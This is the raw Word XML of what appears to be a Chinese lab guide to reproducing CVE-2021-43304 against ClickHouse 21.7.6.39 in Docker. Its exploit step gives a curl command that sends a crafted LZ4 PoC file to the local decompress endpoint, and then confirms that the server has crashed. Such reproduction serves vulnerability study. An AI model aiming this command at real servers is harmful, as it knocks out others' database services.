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C0589" w14:textId="1A7D7DFE" w:rsidR="00DE0246" w:rsidRDefault="00881BAE" w:rsidP="00881BAE">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00881BAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E9741" w14:textId="4D359ECA" w:rsidR="00EA3792" w:rsidRPr="00EA3792" w:rsidRDefault="00EA3792" w:rsidP="00EA3792">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入 Docker 环境文件夹</w:t>
      </w:r>
      <w:r w:rsidR="006B79E3" w:rsidRPr="006B79E3">
        <w:t xml:space="preserve">ClickHouse </w:t>
      </w:r>
      <w:r w:rsidR="00695AEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006B79E3" w:rsidRPr="006B79E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>21.7.6.39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，打开命令行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F449D93" w14:textId="04397F7A" w:rsidR="006B79E3" w:rsidRDefault="00C43EFA" w:rsidP="00DA0DBA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="006B79E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="006B79E3" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose </w:t>
      </w:r>
      <w:r w:rsidR="006B79E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>build构建</w:t>
      </w:r>
      <w:r w:rsidR="006B79E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15217A30" w14:textId="0C93F6D4" w:rsidR="00DA0DBA" w:rsidRDefault="006B79E3" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose up -d</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动环境；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431719C6" w14:textId="3A1DFA3D" w:rsidR="00EA3792" w:rsidRDefault="006B79E3" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose ps</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看数据库环境是否正常运行及开放</w:t>
      </w:r>
      <w:r w:rsidR="00BB76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260C930" w14:textId="17866EDC" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="006B79E3" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="006B79E3">
        <w:t>ClickHouse</w:t>
      </w:r>
      <w:r w:rsidR="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本为</w:t>
      </w:r>
      <w:r w:rsidRPr="006B79E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>21.7.6.39</w:t>
      </w:r>
      <w:r w:rsidR="0060137D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，开放端口为8123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35241458" w14:textId="16D14A05" w:rsidR="00CD5E58" w:rsidRDefault="006B79E3" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、复现结束后使用命令</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> down关闭容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234401B" w14:textId="2E5D962A" w:rsidR="00864F1A" w:rsidRPr="00EA3792" w:rsidRDefault="004D1ED0" w:rsidP="00DA0DBA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4291A30D" wp14:editId="26B3CB5B">
            <wp:extent cx="5274310" cy="3359150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3469780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5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467DA" w14:textId="4D4F8145" w:rsidR="00DA0DBA" w:rsidRDefault="00DA0DBA" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550988DE" w14:textId="77777777" w:rsidR="004D1ED0" w:rsidRDefault="004D1ED0" w:rsidP="004D1ED0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入 PoC 文件夹，执行 PoC 文件发送一个恶意构造的 LZ4 压缩数据流到本地的 ClickHouse 服务，可以看到 ClickHouse 服务器没有返回任何信息（若报错则再次运行）。查看容器状态，可以看到没有容器运行，即 ClickHouse 服务器崩溃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC2F998" w14:textId="77777777" w:rsidR="004D1ED0" w:rsidRPr="004D1ED0" w:rsidRDefault="004D1ED0" w:rsidP="004D1ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D1ED0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat CVE-2021-43304-PoC.bin | curl -sS --data-binary @- 'http://127.0.0.1:8123/?decompress=1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B9BAAF" w14:textId="77777777" w:rsidR="004D1ED0" w:rsidRPr="004D1ED0" w:rsidRDefault="004D1ED0" w:rsidP="004D1ED0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE0C27C" w14:textId="77777777" w:rsidR="004D1ED0" w:rsidRPr="004D1ED0" w:rsidRDefault="004D1ED0" w:rsidP="004D1ED0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D1ED0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>docker ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6D51A" w14:textId="0EF20446" w:rsidR="00864F1A" w:rsidRPr="00864F1A" w:rsidRDefault="004D1ED0" w:rsidP="00C37C0A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F00AACC" wp14:editId="594427B2">
            <wp:extent cx="5274310" cy="819785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="195866610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1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64F1A" w:rsidRPr="00864F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0EC"/>
    <w:rsid w:val="000D0CC9"/>
    <w:rsid w:val="00137508"/>
    <w:rsid w:val="001F470D"/>
    <w:rsid w:val="00353491"/>
    <w:rsid w:val="004950A1"/>
    <w:rsid w:val="004A00AD"/>
    <w:rsid w:val="004D1ED0"/>
    <w:rsid w:val="00553595"/>
    <w:rsid w:val="0060137D"/>
    <w:rsid w:val="00695AEE"/>
    <w:rsid w:val="006B79E3"/>
    <w:rsid w:val="00832EE7"/>
    <w:rsid w:val="00861775"/>
    <w:rsid w:val="00864F1A"/>
    <w:rsid w:val="00881BAE"/>
    <w:rsid w:val="009B33E4"/>
    <w:rsid w:val="009D5886"/>
    <w:rsid w:val="00BB76DC"/>
    <w:rsid w:val="00BC10EC"/>
    <w:rsid w:val="00BC5D71"/>
    <w:rsid w:val="00C37C0A"/>
    <w:rsid w:val="00C43EFA"/>
    <w:rsid w:val="00C66350"/>
    <w:rsid w:val="00CD5E58"/>
    <w:rsid w:val="00D97105"/>
    <w:rsid w:val="00DA0DBA"/>
    <w:rsid w:val="00DA5642"/>
    <w:rsid w:val="00DB3F6F"/>
    <w:rsid w:val="00DE0246"/>
    <w:rsid w:val="00DF4450"/>
    <w:rsid w:val="00EA3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C475B1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{11E091C8-56E0-490E-9331-FEAD1E19C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0CC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C10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1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10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10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10E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10E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10E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10E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10E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10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C1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C1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C10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10E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C10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10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10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10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10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1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10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10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1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10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10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10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1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10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10EC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:rsid w:val="00881BAE"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="样式1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="11"/>
    <w:rsid w:val="00881BAE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70</Words>
  <Characters>399</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop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蒋华 魏</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>魏蒋华</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-27T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-07T01:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>